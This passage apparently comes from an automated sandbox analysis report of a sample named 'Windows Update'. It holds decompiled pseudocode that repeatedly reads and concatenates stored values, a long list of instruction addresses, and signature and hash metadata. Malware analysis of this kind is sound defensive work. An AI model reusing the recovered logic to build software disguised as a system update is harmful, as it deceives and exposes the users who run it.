																						E000FC766( &_v1040, 0x400, 0x47533c);
																						E000FC766( &_v1040, 0x400,  &_v5136);
																						_t600 = _t600 + 0x28;
																					}
																				}
																			}
																			E000A161C(0xb,  &_v4112,  &_v2064);
																			_t600 = _t600 + 0xc;
																		} else {
																			__eflags = _t331;
																			if(_t331 != 0) {
																				goto L63;
																			}
																		}
																	} else {
																		__eflags = _t329;
																		if(_t329 == 0) {
																			goto L59;
																		}
																	}
																	_v10140 = 0x400;
																	_t346 =  *_t558(_v10144, 0x4754fc, 0,  &_v10152,  &_v3088,  &_v10140);
																	_t574 = _t346;
																	_v10148 = 0x1388;
																	_t350 =  *_t558(_v10144, 0x47550c, 0,  &_v10152,  &_v10136,  &_v10148);
																	__eflags = _t346;
																	if(_t346 == 0) {
																		L72:
																		_t508 =  &_v3088;
																		_t543 = _t508 + 1;
																		do {
																			_t351 =  *_t508;
																			_t508 = _t508 + 1;
																			__eflags = _t351;
																		} while (_t351 != 0);
																		_t352 = _v10148;
																		__eflags = _t508 != _t543;
																		if(_t508 != _t543) {
																			L76:
																			_v2064 = 0;
																			__eflags = _t352;
																			if(_t352 != 0) {
																				E000A4CDC(_t486, _t558, _t574,  &_v10136, _t352,  &_v2064, 0x400, 0);
																				_t600 = _t600 + 0x14;
																			}
																			_v10140 = 0x400;
																			_v1040 = 0;
																			_t575 =  *_t558(_v10144, 0x47535c, 0,  &_v10152,  &_v1040,  &_v10140);
																			_v10148 = 4;
																			_v10156 = 0;
																			 *_t558(_v10144, 0x475368, 0,  &_v10152,  &_v10156,  &_v10148);
																			__eflags = _t575;
																			if(_t575 == 0) {
																				__eflags = _v10140 - _t575;
																				if(_v10140 > _t575) {
																					_t437 = _v10156;
																					__eflags = _t437;
																					if(_t437 != 0) {
																						E000FE864(_t437,  &_v5136, 0x400, 0xa);
																						E000FC766( &_v1040, 0x400, 0x47533c);
																						E000FC766( &_v1040, 0x400,  &_v5136);
																						_t600 = _t600 + 0x28;
																					}
																				}
																			}
																			E000A161C(0xb,  &_v4112,  &_v2064);
																			_t600 = _t600 + 0xc;
																		} else {
																			__eflags = _t352;
																			if(_t352 != 0) {
																				goto L76;
																			}
																		}
																	} else {
																		__eflags = _t350;
																		if(_t350 == 0) {
																			goto L72;
																		}
																	}
																	_v10140 = 0x400;
																	_t367 =  *_t558(_v10144, 0x47551c, 0,  &_v10152,  &_v3088,  &_v10140);
																	_t576 = _t367;
																	_v10148 = 0x1388;
																	_t371 =  *_t558(_v10144, 0x47552c, 0,  &_v10152,  &_v10136,  &_v10148);
																	__eflags = _t367;
																	if(_t367 == 0) {
																		L85:
																		_t510 =  &_v3088;
																		_t544 = _t510 + 1;
																		do {
																			_t372 =  *_t510;
																			_t510 = _t510 + 1;
																			__eflags = _t372;
																		} while (_t372 != 0);
																		_t373 = _v10148;
																		__eflags = _t510 != _t544;
																		if(_t510 != _t544) {
																			L89:
																			_v2064 = 0;
																			__eflags = _t373;
																			if(_t373 != 0) {
																				E000A4CDC(_t486, _t558, _t576,  &_v10136, _t373,  &_v2064, 0x400, 0);
																				_t600 = _t600 + 0x14;
																			}
																			_v10140 = 0x400;
																			_v1040 = 0;
																			_t577 =  *_t558(_v10144, 0x475390, 0,  &_v10152,  &_v1040,  &_v10140);
																			_v10148 = 4;
																			_v10156 = 0;
																			 *_t558(_v10144, 0x47539c, 0,  &_v10152,  &_v10156,  &_v10148);
																			__eflags = _t577;
																			if(_t577 == 0) {
																				__eflags = _v10140 - _t577;
																				if(_v10140 > _t577) {
																					_t428 = _v10156;
																					__eflags = _t428;
																					if(_t428 != 0) {
																						E000FE864(_t428,  &_v5136, 0x400, 0xa);
																						E000FC766( &_v1040, 0x400, 0x47533c);
																						E000FC766( &_v1040, 0x400,  &_v5136);
																						_t600 = _t600 + 0x28;
																					}
																				}
																			}
																			E000A161C(0xb,  &_v4112,  &_v2064);
																			_t600 = _t600 + 0xc;
																		} else {
																			__eflags = _t373;
																			if(_t373 != 0) {
																				goto L89;
																			}
																		}
																	} else {
																		__eflags = _t371;
																		if(_t371 == 0) {
																			goto L85;
																		}
																	}
																	_v10140 = 0x400;
																	_t388 =  *_t558(_v10144, 0x47553c, 0,  &_v10152,  &_v3088,  &_v10140);
																	_t578 = _t388;
																	_v10148 = 0x1388;
																	_t392 =  *_t558(_v10144, 0x475550, 0,  &_v10152,  &_v10136,  &_v10148);
																	__eflags = _t388;
																	if(_t388 == 0) {
																		L98:
																		_t512 =  &_v3088;
																		_t544 = _t512 + 1;
																		do {
																			_t393 =  *_t512;
																			_t512 = _t512 + 1;
																			__eflags = _t393;
																		} while (_t393 != 0);
																		_t394 = _v10148;
																		__eflags = _t512 != _t544;
																		if(_t512 != _t544) {
																			L102:
																			_v2064 = 0;
																			__eflags = _t394;
																			if(_t394 != 0) {
																				E000A4CDC(_t486, _t558, _t578,  &_v10136, _t394,  &_v2064, 0x400, 0);
																				_t600 = _t600 + 0x14;
																			}
																			_v10140 = 0x400;
																			_v1040 = 0;
																			 *_t558(_v10144, 0x475564, 0,  &_v10152,  &_v1040,  &_v10140);
																			E000A161C(0xb,  &_v4112,  &_v2064);
																			_t600 = _t600 + 0xc;
																		} else {
																			__eflags = _t394;
																			if(_t394 != 0) {
																				goto L102;
																			}
																		}
																	} else {
																		__eflags = _t392;
																		if(_t392 == 0) {
																			goto L98;
																		}
																	}
																	_v10140 = 0x400;
																	_t405 =  *_t558(_v10144, 0x475574, 0,  &_v10152,  &_v3088,  &_v10140);
																	_v10148 = 0x1388;
																	_t409 =  *_t558(_v10144, 0x475584, 0,  &_v10152,  &_v10136,  &_v10148);
																	__eflags = _t405;
																	_pop(_t580);
																	if(_t405 == 0) {
																		L107:
																		_t411 = E000FC802( &_v3088, 0x475594);
																		_t601 = _t600 + 8;
																		__eflags = _t411;
																		if(_t411 != 0) {
																			_t516 =  &_v3088;
																			_t544 = _t516 + 1;
																			do {
																				_t415 =  *_t516;
																				_t516 = _t516 + 1;
																				__eflags = _t415;
																			} while (_t415 != 0);
																			__eflags = _t516 != _t544;
																			if(_t516 != _t544) {
																				_v2064 = _t415;
																				_t416 = _v10148;
																				__eflags = _t416;
																				if(_t416 != 0) {
																					E000A4CDC(_t486, _t558, _t580,  &_v10136, _t416,  &_v2064, 0x400, 0);
																					_t601 = _t601 + 0x14;
																				}
																				_v10140 = 0x400;
																				_v1040 = 0;
																				 *_t558(_v10144, 0x47559c, 0,  &_v10152,  &_v1040,  &_v10140);
																				E000A161C(0xb,  &_v4112,  &_v2064);
																			}
																		}
																	} else {
																		__eflags = _t409;
																		if(_t409 == 0) {
																			goto L107;
																		}
																	}
																	 *0x474010(_v10144);
																	__eflags = _v16 ^ _t587;
																	_pop(_t559);
																	return L000FBE87(1, _t486, _v16 ^ _t587, _t544, _t559, _t580);
																} else {
																	__eflags = _v16 ^ _t587;
																	return L000FBE87(0, _t486, _v16 ^ _t587,  &_v12392, _t555, _t569);
																}
															} else {
																_push(_t486);
																 *((char*)(_t586 + _t504 - 0x71c)) = _t309;
																_t462 = E000FCABC( &_v1828, 0x475228);
																_t528 =  &_v284;
																_t603 = _t600 + 8;
																_t487 = _t462;
																_t65 = _t528 + 1; // 0x1
																_t545 = _t65;
																do {
																	_t463 =  *_t528;
																	_t528 = _t528 + 1;
																	__eflags = _t463;
																} while (_t463 != 0);
																_t529 = _t528 - _t545;
																__eflags = _t529;
																_t546 =  &_v24;
																_t581 = _t546 + 1;
																do {
																	_t464 =  *_t546;
																	_t546 = _t546 + 1;
																	__eflags = _t464;
																} while (_t464 != 0);
																_t537 = _t546 - _t581;
																__eflags = _t537;
																_t582 = _t487;
																_t68 = _t582 + 1; // 0x1
																_t560 = _t68;
																do {
																	_t465 =  *_t582;
																	_t582 = _t582 + 1;
																	__eflags = _t465;
																} while (_t465 != 0);
																_t69 = _t529 + 3; // 0x4
																_t569 = _t582 - _t560 + _t69 + _t537;
																_t468 = L000FCD57(_t487, _t560, _t582 - _t560 + _t69 + _t537);
																_t555 = _t468;
																_t596 = _t603 + 4;
																__eflags = _t468;
																if(__eflags != 0) {
																	E000FC711(_t555, _t569,  &_v284);
																	E000FC766(_t555, _t569, 0x474d84);
																	E000FC766(_t555, _t569,  &_v24);
																	E000FC766(_t555, _t569, 0x474d84);
																	_t72 = _t487 + 1; // 0x1
																	E000FC766(_t555, _t569, _t72);
																	_t596 = _t596 + 0x3c;
																}
																_pop(_t486);
																goto L51;
															}
														} else {
															goto L35;
														}
													} else {
														_t482 = E000FCABC( &_v1828, 0x47520c);
														_t599 = _t598 + 8;
														__eflags = _t482;
														if(__eflags != 0) {
															_t569 = 1;
														}
														goto L35;
													}
													goto L115;
													L35:
													_push(_v1832);
													_push(0x400);
													_push( &_v1828);
													_t478 = E000FD996(_t486, _t555, _t569, __eflags);
													_t596 = _t599 + 0xc;
													__eflags = _t478;
												} while (__eflags != 0);
												_push(_v1832);
												E000FD91F(_t486, _t555, _t569, __eflags);
												_pop(_t561);
												_pop(_t584);
												__eflags = _v12 ^ _t586;
												return L000FBE87(_t555, _t486, _v12 ^ _t586, _t537, _t561, _t584);
											}
										}
									}
								} else {
									 *0x47412c();
									L26:
									_pop(_t556);
									_pop(_t570);
									__eflags = _v12 ^ _t586;
									return L000FBE87(0, _t486, _v12 ^ _t586, _t537, _t556, _t570);
								}
							} else {
								 *((char*)(_t585 + _t267 - 0x108)) = 0;
								goto L14;
							}
						}
					}
				}
				L115:
			}

















































































































































                                                                                                                    0x000a35cc
                                                                                                                    0x000a35d6
                                                                                                                    0x000a35e1
                                                                                                                    0x000a35e1
                                                                                                                    0x000a35f1
                                                                                                                    0x000a35f2
                                                                                                                    0x000a35f9
                                                                                                                    0x000a35fe
                                                                                                                    0x000a3607
                                                                                                                    0x000a3608
                                                                                                                    0x000a360d
                                                                                                                    0x000a3615
                                                                                                                    0x000a3616
                                                                                                                    0x000a361b
                                                                                                                    0x000a362d
                                                                                                                    0x000a3747
                                                                                                                    0x000a374a
                                                                                                                    0x000a374d
                                                                                                                    0x000a374f
                                                                                                                    0x000a3758
                                                                                                                    0x000a3633
                                                                                                                    0x000a3652
                                                                                                                    0x000a365a
                                                                                                                    0x000a3741
                                                                                                                    0x00000000
                                                                                                                    0x000a3678
                                                                                                                    0x000a367e
                                                                                                                    0x000a368b
                                                                                                                    0x000a368d
                                                                                                                    0x000a3693
                                                                                                                    0x000a3693
                                                                                                                    0x000a3693
                                                                                                                    0x000a369c
                                                                                                                    0x000a369c
                                                                                                                    0x000a369e
                                                                                                                    0x000a36a1
                                                                                                                    0x00000000
                                                                                                                    0x000a36a3
                                                                                                                    0x000a36a5
                                                                                                                    0x000a36a8
                                                                                                                    0x000a36aa
                                                                                                                    0x000a36b6
                                                                                                                    0x000a36b6
                                                                                                                    0x000a36b6
                                                                                                                    0x000a36b6
                                                                                                                    0x000a36a8
                                                                                                                    0x000a36a1
                                                                                                                    0x000a36b8
                                                                                                                    0x000a36be
                                                                                                                    0x000a36be
                                                                                                                    0x000a36c1
                                                                                                                    0x000a36c1
                                                                                                                    0x000a36c3
                                                                                                                    0x000a36c4
                                                                                                                    0x000a36ca
                                                                                                                    0x000a36ca
                                                                                                                    0x000a36cf
                                                                                                                    0x000a36e0
                                                                                                                    0x000a36e0
                                                                                                                    0x000a36e6
                                                                                                                    0x000a36e6
                                                                                                                    0x000a36e6
                                                                                                                    0x000a36ec
                                                                                                                    0x000a36ec
                                                                                                                    0x000a36ee
                                                                                                                    0x000a36f1
                                                                                                                    0x00000000
                                                                                                                    0x000a36f3
                                                                                                                    0x000a36f5
                                                                                                                    0x000a36f5
                                                                                                                    0x000a36f9
                                                                                                                    0x000a36fe
                                                                                                                    0x000a3705
                                                                                                                    0x000a3710
                                                                                                                    0x000a3715
                                                                                                                    0x000a3718
                                                                                                                    0x000a371b
                                                                                                                    0x000a3729
                                                                                                                    0x000a3729
                                                                                                                    0x000a36d1
                                                                                                                    0x000a36d1
                                                                                                                    0x000a36db
                                                                                                                    0x000a36de
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x000a36de
                                                                                                                    0x000a372a
                                                                                                                    0x000a372f
                                                                                                                    0x000a3759
                                                                                                                    0x000a375e
                                                                                                                    0x000a375f
                                                                                                                    0x000a3760
                                                                                                                    0x000a3761
                                                                                                                    0x000a3762
                                                                                                                    0x000a3763
                                                                                                                    0x000a3764
                                                                                                                    0x000a3765
                                                                                                                    0x000a3766
                                                                                                                    0x000a3767
                                                                                                                    0x000a3768
                                                                                                                    0x000a3769
                                                                                                                    0x000a376a
                                                                                                                    0x000a376b
                                                                                                                    0x000a376d
                                                                                                                    0x000a377c
                                                                                                                    0x000a378f
                                                                                                                    0x000a3796
                                                                                                                    0x000a37a0
                                                                                                                    0x000a37a8
                                                                                                                    0x000a37ab
                                                                                                                    0x000a37b5
                                                                                                                    0x000a37bc
                                                                                                                    0x000a37c1
                                                                                                                    0x000a37c3
                                                                                                                    0x000a37c9
                                                                                                                    0x000a37cb
                                                                                                                    0x000a37f8
                                                                                                                    0x000a380e
                                                                                                                    0x000a3823
                                                                                                                    0x000a3839
                                                                                                                    0x000a3851
                                                                                                                    0x000a3857
                                                                                                                    0x000a385c
                                                                                                                    0x000a385f
                                                                                                                    0x000a3861
                                                                                                                    0x00000000
                                                                                                                    0x000a3867
                                                                                                                    0x000a3867
                                                                                                                    0x000a386d
                                                                                                                    0x000a386f
                                                                                                                    0x00000000
                                                                                                                    0x000a3875
                                                                                                                    0x000a3875
                                                                                                                    0x000a387c
                                                                                                                    0x000a3881
                                                                                                                    0x000a3882
                                                                                                                    0x000a3887
                                                                                                                    0x000a388a
                                                                                                                    0x000a388c
                                                                                                                    0x000a3a0b
                                                                                                                    0x000a3a0b
                                                                                                                    0x000a3a11
                                                                                                                    0x000a3a1e
                                                                                                                    0x000a3a1f
                                                                                                                    0x000a3a21
                                                                                                                    0x000a3a2a
                                                                                                                    0x000a3892
                                                                                                                    0x000a389c
                                                                                                                    0x000a38a8
                                                                                                                    0x000a38ad
                                                                                                                    0x000a38b6
                                                                                                                    0x000a38b8
                                                                                                                    0x000a38d9
                                                                                                                    0x000a38de
                                                                                                                    0x000a38e1
                                                                                                                    0x000a38e3
                                                                                                                    0x000a392f
                                                                                                                    0x000a3934
                                                                                                                    0x000a3937
                                                                                                                    0x000a3939
                                                                                                                    0x000a393b
                                                                                                                    0x000a393b
                                                                                                                    0x000a393e
                                                                                                                    0x000a3944
                                                                                                                    0x000a394c
                                                                                                                    0x000a394c
                                                                                                                    0x000a394e
                                                                                                                    0x000a394f
                                                                                                                    0x000a394f
                                                                                                                    0x000a3955
                                                                                                                    0x000a3956
                                                                                                                    0x000a395c
                                                                                                                    0x000a3a2b
                                                                                                                    0x000a3a30
                                                                                                                    0x000a3a31
                                                                                                                    0x000a3a32
                                                                                                                    0x000a3a33
                                                                                                                    0x000a3a34
                                                                                                                    0x000a3a35
                                                                                                                    0x000a3a36
                                                                                                                    0x000a3a37
                                                                                                                    0x000a3a38
                                                                                                                    0x000a3a39
                                                                                                                    0x000a3a3a
                                                                                                                    0x000a3a3b
                                                                                                                    0x000a3a3d
                                                                                                                    0x000a3a44
                                                                                                                    0x000a3a50
                                                                                                                    0x000a3a53
                                                                                                                    0x000a3a64
                                                                                                                    0x000a3a77
                                                                                                                    0x000a3a7d
                                                                                                                    0x000a3a7f
                                                                                                                    0x000a3a92
                                                                                                                    0x000a3aba
                                                                                                                    0x000a3ac4
                                                                                                                    0x000a3acb
                                                                                                                    0x000a3acd
                                                                                                                    0x000a3acf
                                                                                                                    0x000a3af3
                                                                                                                    0x000a3afd
                                                                                                                    0x000a3afd
                                                                                                                    0x000a3b22
                                                                                                                    0x000a3b2c
                                                                                                                    0x000a3b2e
                                                                                                                    0x000a3b52
                                                                                                                    0x000a3b5c
                                                                                                                    0x000a3b5e
                                                                                                                    0x000a3b60
                                                                                                                    0x000a3b6a
                                                                                                                    0x000a3b6a
                                                                                                                    0x000a3b70
                                                                                                                    0x000a3b73
                                                                                                                    0x000a3b73
                                                                                                                    0x000a3b75
                                                                                                                    0x000a3b76
                                                                                                                    0x000a3b76
                                                                                                                    0x000a3b7a
                                                                                                                    0x000a3b80
                                                                                                                    0x000a3b82
                                                                                                                    0x000a3b8c
                                                                                                                    0x000a3b8c
                                                                                                                    0x000a3b93
                                                                                                                    0x000a3b95
                                                                                                                    0x000a3bad
                                                                                                                    0x000a3bb2
                                                                                                                    0x000a3bb2
                                                                                                                    0x000a3bd7
                                                                                                                    0x000a3be1
                                                                                                                    0x000a3bea
                                                                                                                    0x000a3c0e
                                                                                                                    0x000a3c18
                                                                                                                    0x000a3c22
                                                                                                                    0x000a3c24
                                                                                                                    0x000a3c26
                                                                                                                    0x000a3c28
                                                                                                                    0x000a3c2e
                                                                                                                    0x000a3c30
                                                                                                                    0x000a3c36
                                                                                                                    0x000a3c38
                                                                                                                    0x000a3c49
                                                                                                                    0x000a3c5f
                                                                                                                    0x000a3c77
                                                                                                                    0x000a3c7c
                                                                                                                    0x000a3c7c
                                                                                                                    0x000a3c38
                                                                                                                    0x000a3c2e
                                                                                                                    0x000a3c8f
                                                                                                                    0x000a3c94
                                                                                                                    0x000a3b84
                                                                                                                    0x000a3b84
                                                                                                                    0x000a3b86
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x000a3b86
                                                                                                                    0x000a3b62
                                                                                                                    0x000a3b62
                                                                                                                    0x000a3b64
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x000a3b64
                                                                                                                    0x000a3cb9
                                                                                                                    0x000a3cc3
                                                                                                                    0x000a3cc5
                                                                                                                    0x000a3ce9
                                                                                                                    0x000a3cf3
                                                                                                                    0x000a3cf5
                                                                                                                    0x000a3cf7
                                                                                                                    0x000a3d01
                                                                                                                    0x000a3d01
                                                                                                                    0x000a3d07
                                                                                                                    0x000a3d0c
                                                                                                                    0x000a3d0c
                                                                                                                    0x000a3d0e
                                                                                                                    0x000a3d0f
                                                                                                                    0x000a3d0f
                                                                                                                    0x000a3d13
                                                                                                                    0x000a3d19
                                                                                                                    0x000a3d1b
                                                                                                                    0x000a3d25
                                                                                                                    0x000a3d25
                                                                                                                    0x000a3d2c
                                                                                                                    0x000a3d2e
                                                                                                                    0x000a3d46
                                                                                                                    0x000a3d4b
                                                                                                                    0x000a3d4b
                                                                                                                    0x000a3d70
                                                                                                                    0x000a3d7a
                                                                                                                    0x000a3d83
                                                                                                                    0x000a3da7
                                                                                                                    0x000a3db1
                                                                                                                    0x000a3dbb
                                                                                                                    0x000a3dbd
                                                                                                                    0x000a3dbf
                                                                                                                    0x000a3dc1
                                                                                                                    0x000a3dc7
                                                                                                                    0x000a3dc9
                                                                                                                    0x000a3dcf
                                                                                                                    0x000a3dd1
                                                                                                                    0x000a3de2
                                                                                                                    0x000a3df8
                                                                                                                    0x000a3e10
                                                                                                                    0x000a3e15
                                                                                                                    0x000a3e15
                                                                                                                    0x000a3dd1
                                                                                                                    0x000a3dc7
                                                                                                                    0x000a3e28
                                                                                                                    0x000a3e2d
                                                                                                                    0x000a3d1d
                                                                                                                    0x000a3d1d
                                                                                                                    0x000a3d1f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x000a3d1f
                                                                                                                    0x000a3cf9
                                                                                                                    0x000a3cf9
                                                                                                                    0x000a3cfb
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x000a3cfb
                                                                                                                    0x000a3e52
                                                                                                                    0x000a3e5c
                                                                                                                    0x000a3e5e
                                                                                                                    0x000a3e82
                                                                                                                    0x000a3e8c
                                                                                                                    0x000a3e8e
                                                                                                                    0x000a3e90
                                                                                                                    0x000a3e9a
                                                                                                                    0x000a3e9a
                                                                                                                    0x000a3ea0
                                                                                                                    0x000a3ea3
                                                                                                                    0x000a3ea3
                                                                                                                    0x000a3ea5
                                                                                                                    0x000a3ea6
                                                                                                                    0x000a3ea6
                                                                                                                    0x000a3eaa
                                                                                                                    0x000a3eb0
                                                                                                                    0x000a3eb2
                                                                                                                    0x000a3ebc
                                                                                                                    0x000a3ebc
                                                                                                                    0x000a3ec3
                                                                                                                    0x000a3ec5
                                                                                                                    0x000a3edd
                                                                                                                    0x000a3ee2
                                                                                                                    0x000a3ee2
                                                                                                                    0x000a3f07
                                                                                                                    0x000a3f11
                                                                                                                    0x000a3f1a
                                                                                                                    0x000a3f3e
                                                                                                                    0x000a3f48
                                                                                                                    0x000a3f52
                                                                                                                    0x000a3f54
                                                                                                                    0x000a3f56
                                                                                                                    0x000a3f58
                                                                                                                    0x000a3f5e
                                                                                                                    0x000a3f60
                                                                                                                    0x000a3f66
                                                                                                                    0x000a3f68
                                                                                                                    0x000a3f79
                                                                                                                    0x000a3f8f
                                                                                                                    0x000a3fa7
                                                                                                                    0x000a3fac
                                                                                                                    0x000a3fac
                                                                                                                    0x000a3f68
                                                                                                                    0x000a3f5e
                                                                                                                    0x000a3fbf
                                                                                                                    0x000a3fc4
                                                                                                                    0x000a3eb4
                                                                                                                    0x000a3eb4
                                                                                                                    0x000a3eb6
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x000a3eb6
                                                                                                                    0x000a3e92
                                                                                                                    0x000a3e92
                                                                                                                    0x000a3e94
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x000a3e94
                                                                                                                    0x000a3fe9
                                                                                                                    0x000a3ff3
                                                                                                                    0x000a3ff5
                                                                                                                    0x000a4019
                                                                                                                    0x000a4023
                                                                                                                    0x000a4025
                                                                                                                    0x000a4027
                                                                                                                    0x000a4031
                                                                                                                    0x000a4031
                                                                                                                    0x000a4037
                                                                                                                    0x000a403c
                                                                                                                    0x000a403c
                                                                                                                    0x000a403e
                                                                                                                    0x000a403f
                                                                                                                    0x000a403f
                                                                                                                    0x000a4043
                                                                                                                    0x000a4049
                                                                                                                    0x000a404b
                                                                                                                    0x000a4051
                                                                                                                    0x000a4051
                                                                                                                    0x000a4058
                                                                                                                    0x000a405a
                                                                                                                    0x000a4072
                                                                                                                    0x000a4077
                                                                                                                    0x000a4077
                                                                                                                    0x000a409c
                                                                                                                    0x000a40a6
                                                                                                                    0x000a40ad
                                                                                                                    0x000a40bf
                                                                                                                    0x000a40c4
                                                                                                                    0x000a404d
                                                                                                                    0x000a404d
                                                                                                                    0x000a404f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x000a404f
                                                                                                                    0x000a4029
                                                                                                                    0x000a4029
                                                                                                                    0x000a402b
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x000a402b
                                                                                                                    0x000a40e9
                                                                                                                    0x000a40f3
                                                                                                                    0x000a4119
                                                                                                                    0x000a4123
                                                                                                                    0x000a4125
                                                                                                                    0x000a4127
                                                                                                                    0x000a4128
                                                                                                                    0x000a4132
                                                                                                                    0x000a413e
                                                                                                                    0x000a4143
                                                                                                                    0x000a4146
                                                                                                                    0x000a4148
                                                                                                                    0x000a414e
                                                                                                                    0x000a4154
                                                                                                                    0x000a415c
                                                                                                                    0x000a415c
                                                                                                                    0x000a415e
                                                                                                                    0x000a415f
                                                                                                                    0x000a415f
                                                                                                                    0x000a4163
                                                                                                                    0x000a4165
                                                                                                                    0x000a4167
                                                                                                                    0x000a416d
                                                                                                                    0x000a4173
                                                                                                                    0x000a4175
                                                                                                                    0x000a418d
                                                                                                                    0x000a4192
                                                                                                                    0x000a4192
                                                                                                                    0x000a41b7
                                                                                                                    0x000a41c1
                                                                                                                    0x000a41c8
                                                                                                                    0x000a41da
                                                                                                                    0x000a41df
                                                                                                                    0x000a4165
                                                                                                                    0x000a412a
                                                                                                                    0x000a412a
                                                                                                                    0x000a412c
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x000a412c
                                                                                                                    0x000a41e8
                                                                                                                    0x000a41f1
                                                                                                                    0x000a41f8
                                                                                                                    0x000a4201
                                                                                                                    0x000a3a81
                                                                                                                    0x000a3a86
                                                                                                                    0x000a3a90
                                                                                                                    0x000a3a90
                                                                                                                    0x000a3962
                                                                                                                    0x000a3962
                                                                                                                    0x000a3963
                                                                                                                    0x000a3976
                                                                                                                    0x000a397b
                                                                                                                    0x000a3981
                                                                                                                    0x000a3984
                                                                                                                    0x000a3986
                                                                                                                    0x000a3986
                                                                                                                    0x000a398c
                                                                                                                    0x000a398c
                                                                                                                    0x000a398e
                                                                                                                    0x000a398f
                                                                                                                    0x000a398f
                                                                                                                    0x000a3993
                                                                                                                    0x000a3993
                                                                                                                    0x000a3995
                                                                                                                    0x000a3998
                                                                                                                    0x000a399c
                                                                                                                    0x000a399c
                                                                                                                    0x000a399e
                                                                                                                    0x000a399f
                                                                                                                    0x000a399f
                                                                                                                    0x000a39a3
                                                                                                                    0x000a39a3
                                                                                                                    0x000a39a5
                                                                                                                    0x000a39a7
                                                                                                                    0x000a39a7
                                                                                                                    0x000a39ac
                                                                                                                    0x000a39ac
                                                                                                                    0x000a39ae
                                                                                                                    0x000a39af
                                                                                                                    0x000a39af
                                                                                                                    0x000a39b3
                                                                                                                    0x000a39ba
                                                                                                                    0x000a39bd
                                                                                                                    0x000a39c2
                                                                                                                    0x000a39c4
                                                                                                                    0x000a39c7
                                                                                                                    0x000a39c9
                                                                                                                    0x000a39d4
                                                                                                                    0x000a39e0
                                                                                                                    0x000a39eb
                                                                                                                    0x000a39f7
                                                                                                                    0x000a39fc
                                                                                                                    0x000a3a02
                                                                                                                    0x000a3a07
                                                                                                                    0x000a3a07
                                                                                                                    0x000a3a0a
                                                                                                                    0x00000000
                                                                                                                    0x000a3a0a
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x000a38ba
                                                                                                                    0x000a38c0
                                                                                                                    0x000a38c5
                                                                                                                    0x000a38c8
                                                                                                                    0x000a38ca
                                                                                                                    0x000a38cc
                                                                                                                    0x000a38cc
                                                                                                                    0x00000000
                                                                                                                    0x000a38ca
                                                                                                                    0x00000000
                                                                                                                    0x000a38e5
                                                                                                                    0x000a38e5
                                                                                                                    0x000a38f1
                                                                                                                    0x000a38f6
                                                                                                                    0x000a38f7
                                                                                                                    0x000a38fc
                                                                                                                    0x000a38ff
                                                                                                                    0x000a38ff
                                                                                                                    0x000a3903
                                                                                                                    0x000a3909
                                                                                                                    0x000a3913
                                                                                                                    0x000a3914
                                                                                                                    0x000a3918
                                                                                                                    0x000a3922
                                                                                                                    0x000a3922
                                                                                                                    0x000a388c
                                                                                                                    0x000a386f
                                                                                                                    0x000a37cd
                                                                                                                    0x000a37cd
                                                                                                                    0x000a37d3
                                                                                                                    0x000a37d3
                                                                                                                    0x000a37d6
                                                                                                                    0x000a37da
                                                                                                                    0x000a37e4
                                                                                                                    0x000a37e4
                                                                                                                    0x000a3731
                                                                                                                    0x000a3731
                                                                                                                    0x00000000
                                                                                                                    0x000a3731
                                                                                                                    0x000a372f
                                                                                                                    0x000a36cf
                                                                                                                    0x000a365a
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.301202133.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Offset: 00010000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.301191899.0000000000010000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_10000_Windows Update.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _malloc_memset
                                                                                                                    • String ID: \
                                                                                                                    • API String ID: 4137368368-2967466578
                                                                                                                    • Opcode ID: 67a0d2a9d27cc0402ae9e2222e9eae23d452d4267665526943c6ccb8d02e3255
                                                                                                                    • Instruction ID: 9a94e6f1dd5b83a6405c264777ad4b767593cdceadd02f088b2d8d129c279e08
                                                                                                                    • Opcode Fuzzy Hash: 67a0d2a9d27cc0402ae9e2222e9eae23d452d4267665526943c6ccb8d02e3255
                                                                                                                    • Instruction Fuzzy Hash: 4141207090415CAADF70DEA4CC44BFDB7A8AB12304F1440E9E988AA552DBB15FC9CF80
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 001010E8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 127COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 88%
                                                                                                                    			E001010E8(signed int _a4, signed int _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t43;
				signed int _t46;
				signed int _t50;
				void* _t58;
				signed int _t60;
				void* _t62;
				signed int _t65;
				signed int _t68;
				signed int _t71;
				signed int _t73;
				void* _t74;
				signed int _t82;
				signed int _t83;
				signed int _t84;
				signed int* _t85;

				_t85 = _a8;
				_t43 = E00102BC8(_t85);
				_t71 = _t85[3];
				_t84 = _t43;
				if((_t71 & 0x00000082) != 0) {
					__eflags = _t71 & 0x00000040;
					if((_t71 & 0x00000040) == 0) {
						_t68 = 0;
						__eflags = _t71 & 0x00000001;
						if((_t71 & 0x00000001) == 0) {
							L8:
							_t46 = _t85[3] & 0xffffffef | 0x00000002;
							_t85[3] = _t46;
							_t85[1] = _t68;
							__eflags = _t46 & 0x0000010c;
							if((_t46 & 0x0000010c) != 0) {
								L13:
								__eflags = _t85[3] & 0x00000108;
								if((_t85[3] & 0x00000108) == 0) {
									__eflags = 1;
									_push(1);
									_a8 = 1;
									_push( &_a4);
									_push(_t84);
